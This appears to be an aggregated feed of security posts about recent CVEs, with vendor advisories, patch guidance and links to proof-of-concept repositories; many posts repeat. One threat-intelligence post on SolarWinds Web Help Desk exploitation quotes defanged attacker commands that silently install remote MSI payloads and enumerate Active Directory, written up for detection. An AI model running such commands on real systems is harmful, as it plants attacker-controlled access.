##updated 2026-02-10T15:02:32.033000
2 posts
🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T14:33:38.680000
2 posts
🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25751 - High (7.5)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An information disclosure vulnerability in FUXA allows an unauthenticated, remote attacker to retrieve sensitive administrative database credentials. Exploitation allows an ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25751/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T14:31:52.450000
2 posts
🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-25752 - Critical (9.1)
FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An authorization bypass vulnerability in FUXA allows an unauthenticated, remote attacker to modify device tags via WebSockets. Exploitation allows an unauthenticated, remote...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25752/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
1 posts
🟠 CVE-2026-25656 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25656/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:34
1 posts
1 repos
🟠 CVE-2026-2268 - High (7.5)
The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.14.0. This is due to the unsafe application of the `ninja_forms_merge_tags` filter to user-supplied input within repeater ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2268/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:33
1 posts
🟠 CVE-2026-25655 - High (7.8)
A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The affected application permits improper modification of a configuration file by a low-privileged user.
This could allow an attacker to load malicious DLLs, potential...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25655/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:28
2 posts
🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23719 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected application is vulnerable to heap-based buffer overflow while parsing specially crafted NDB files. This cou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23719/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T12:30:27
2 posts
🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-40587 - High (7.6)
A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40587/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
3 posts
🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2097 - High (8.8)
Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allowing authenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2097/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T09:30:31
3 posts
🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2096 - Critical (9.8)
Agentflow developed by Flowring has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to read, modify, and delete database contents by using a specific functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2096/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:45
5 posts
‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23687 - High (8.8)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23687/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:44
1 posts
🟠 CVE-2026-23689 - High (7.7)
Due to an uncontrolled resource consumption (Denial of Service) vulnerability, an authenticated attacker with regular user privileges and network access can repeatedly invoke a remote-enabled function module with an excessively large loop-control ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:40
1 posts
🟠 CVE-2025-11547 - High (7.8)
AXIS Camera Station Pro contained a flaw to perform a privilege escalation attack on the server as a non-admin user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11547/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T06:30:38
3 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
🔴 CVE-2026-0488 - Critical (9.9)
An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could exploit a flaw in a generic function module call and execute unauthorized critical functionalities, which includes the ability to execute an arbitrary SQL statement. Thi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0488/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T02:15:52.253000
2 posts
2 repos
CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation https://lobste.rs/s/ghqflm #security
https://cvefeed.io/vuln/detail/CVE-2026-1529
CVE-2026-1529 - keycloak: unauthorized organization registration via improper invitation token validation https://lobste.rs/s/ghqflm #security
https://cvefeed.io/vuln/detail/CVE-2026-1529
updated 2026-02-10T00:30:37
1 posts
🟠 CVE-2025-15310 - High (7.8)
Tanium addressed a local privilege escalation vulnerability in Patch Endpoint Tools.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-15310/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-09T21:55:30.093000
1 posts
Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- Git default branch: Git 3.0 will make "main" the default branch by end of 2026.
- COLRv1 in WebKit: COLRv1 font rendering support in WebKit.
- Linux kernel 7.0: io_uring gains filtering support (cBPF opcodes) and per-task filters.
- AWS Lambda CVEs: 29 CVEs across 27 Lambda base images; CVE-2026-25639 affecting base images.
- Post-OOP: Move [1/2]
updated 2026-02-09T16:08:55.263000
2 posts
3 repos
https://github.com/z3r0h3ro/CVE-2026-1731-exp
‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##‼️ Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support & PRA Exposes Thousands of Instances (CVE-2026-1731)
##updated 2026-02-09T16:08:35.290000
2 posts
HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il
HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.
**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/hgiga-patches-critical-authentication-bypass-and-sql-injection-flaws-in-c-cm-il-b-m-r-j-8/gD2P6Ple2L
HGiga Patches Critical Authentication Bypass and SQL Injection Flaws in C&Cm@il
HGiga patched three vulnerabilities in its C&Cm@il platform, including a critical missing authentication flaw (CVE-2026-2234) that allows unauthenticated attackers to read and modify any user's emails.
**If you use HGiga C&Cm@il, plan a quick update to version 7.0-978. Since the most severe flaw allows attackers to read mail without a password, treat this as a high-priority emergency patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/hgiga-patches-critical-authentication-bypass-and-sql-injection-flaws-in-c-cm-il-b-m-r-j-8/gD2P6Ple2L
updated 2026-02-06T21:57:22.450000
2 posts
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
updated 2026-02-06T21:57:22.450000
2 posts
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
Critical Gogs Vulnerabilities Enable Remote Code Execution and 2FA Bypass
Gogs released security updates to address a critical RCE vulnerability (CVE-2025-64111) and a 2FA bypass (CVE-2025-64175) affecting self-hosted Git instances. These flaws allow authenticated attackers to execute system commands via malicious Git configurations or take over user accounts by misusing recovery codes.
**If you are using self-hosted Gogs, this is important - especially if your Gogs is publicly accessible and free to register. Update to version 0.13.4. If you cannot patch right away, restrict network access to your Git service and ensure only trusted users can register and push code.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-gogs-vulnerabilities-enable-remote-code-execution-and-2fa-bypass-0-4-b-b-k/gD2P6Ple2L
updated 2026-02-06T17:37:28.723000
2 posts
2 repos
Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##Palo Alto advisory, posted yesterday:
Moderate: CVE-2026-0227 PAN-OS: Firewall Denial of Service (DoS) in GlobalProtect Gateway and Portal https://security.paloaltonetworks.com/CVE-2026-0227 #PaloAlto #infosec #vulnerability
##updated 2026-02-06T15:14:47.703000
5 posts
Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Fortinet’s CVE-2026-21643 highlights a persistent issue: management and control-plane components remain prime attack surfaces.
SQL injection leading to unauthenticated code execution reinforces the need for rapid patch cycles, continuous monitoring, and segmentation of security tooling.
Source: https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
💬 How are you reducing blast radius for management infrastructure?
🔔 Follow @technadu for threat-focused security coverage
#Infosec #Fortinet #VulnerabilityResearch #SQLInjection #ZeroTrust #CyberDefense #TechNadu
##The vulnerability, tracked as CVE-2026-21643, has a CVSS rating of 9.1 out of a maximum of 10.0. https://thehackernews.com/2026/02/fortinet-patches-critical-sqli-flaw.html
##Critical SQL Injection Vulnerability in Fortinet FortiClientEMS Allows Remote Code Execution
Fortinet patched a critical SQL injection vulnerability (CVE-2026-21643) in FortiClientEMS that allows unauthenticated attackers to execute arbitrary code.
**If you are using FortiClientEMS make sure the management interface is isolated from the internet and accessible only from trusted networks. Then plan a quick patch if you are on 7.4 versions. Attackers will start exploting this very soon.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-fortinet-forticlientems-allows-remote-code-execution-7-8-j-i-r/gD2P6Ple2L
updated 2026-02-05T20:22:47.870000
4 posts
1 repos
https://github.com/otakuliu/Expression-Sandbox-Escape-Simulation-Lab
🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta
「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」
##Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
🐞 Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security // Het Mehta
「 CVE-2026-25049, a critical vulnerability with a CVSS score of 9.4 that let attackers execute arbitrary system commands on n8n servers. What makes this particularly interesting (and painful for n8n’s security team) is that this vulnerability bypassed a security fix they had just deployed two months earlier 」
##Breaking Down CVE-2026-25049: How TypeScript Types Failed n8n's Security via @wezm https://lobste.rs/s/wepiig #security
https://hetmehta.com/posts/n8n-type-confusion-rce/
updated 2026-02-04T21:31:24
1 posts
9 repos
https://github.com/helidem/CVE-2025-24054_CVE-2025-24071-PoC
https://github.com/Marcejr117/CVE-2025-24071_PoC
https://github.com/Wind010/CVE-2025-24054_PoC
https://github.com/Yuri08loveElaina/CVE-2025-24054_POC
https://github.com/rubenformation/CVE-2025-50154
https://github.com/S4mma3l/CVE-2025-24054
https://github.com/Untouchable17/CVE-2025-24054
🚨 New Exploit: Windows 10.0.17763.7009 - spoofing vulnerability
📋 CVE: CVE-2025-24054
👤 Author: beatrizfn
🔗 https://www.exploit-db.com/exploits/52480
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-24054
##updated 2026-02-04T18:30:51
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2026-02-04T16:34:21.763000
1 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-02-03T21:31:50
1 posts
----------------
🎯 Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
🔹 solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
🔗 Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##updated 2026-01-30T00:31:29
1 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
“Reports that two previously patched Ivanti remote code execution (RCE) bugs were exploited at the Dutch Data Protection Authority and Judicial Council and at the European Union (EU) raised concerns worldwide that these attacks will spread.
The two 9.8 RCEs are in Ivanti Endpoint Manager Mobile (EPMM). One of the RCEs, CVE-2026-1281 was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog Jan. 28. The other 9.8 bug was CVE-2026-1340.
Security teams were told to consider this case an emergency patch situation.”
https://www.scworld.com/news/emergency-patches-advised-after-attacks-on-ivanti-epmm-devices
##updated 2026-01-29T16:53:56.950000
2 posts
@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##@todb Oh mighty CVE Seer! Pray expound upon which arcane spell doth cause a 2025 birthed vulnerability to don a CVE-2015 prefix?
CVE-2015-10145 — Published: 2025-12-31
##updated 2026-01-29T15:31:31
2 posts
4 repos
https://github.com/balgan/CVE-2025-15467
https://github.com/guiimoraes/CVE-2025-15467
This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##This critical Broadcom vulnerability advisory was updated yesterday. You'll need a login for details.
Broadcom Mainframe Software Security Advisory for Critical OpenSSL Vulnerability CVE-2025-15467 https://support.broadcom.com/web/ecx/security-advisory #infosec #Broadcom #vulnerability
##updated 2026-01-27T14:59:34.073000
1 posts
I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.
The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security
More information about the issue:
https://github.com/shaarli/Shaarli/security/advisories/GHSA-g3xq-mj52-f8pg
https://security-tracker.debian.org/tracker/CVE-2026-24476
updated 2026-01-14T20:31:32.760000
1 posts
Windows Error Reporting Flaw Lets Standard Users Reach SYSTEM: Inside CVE-2026-20817
Introduction A quiet but deeply dangerous vulnerability inside Windows Error Reporting (WER) has exposed a new path for local privilege escalation, allowing ordinary users to obtain near-SYSTEM level control. Tracked as CVE-2026-20817 and patched by Microsoft in January 2026, the flaw sits in a core crash-handling mechanism that runs by default on nearly every Windows machine. While no…
##updated 2026-01-07T18:30:33
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2026-01-07T18:30:33
2 posts
Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##Cisco posted two advisories yesterday, if you missed them.
- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-tce-roomos-dos-9V9jrC2q
- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH @cisco #Cisco #infosec #vulnerability
##updated 2025-12-17T21:31:01
2 posts
7 repos
https://github.com/bjrjk/CVE-2025-43529
https://github.com/SimoesCTT/Convergent-Time-Theory-Enhanced-iOS-Safari-RCE-CVE-2025-43529-
https://github.com/sakyu7/sakyu7.github.io
https://github.com/SimoesCTT/CTT-Apple-Silicon-Refraction
https://github.com/SgtBattenHA/Analysis
📣 EMERGENCY UPDATES 📣
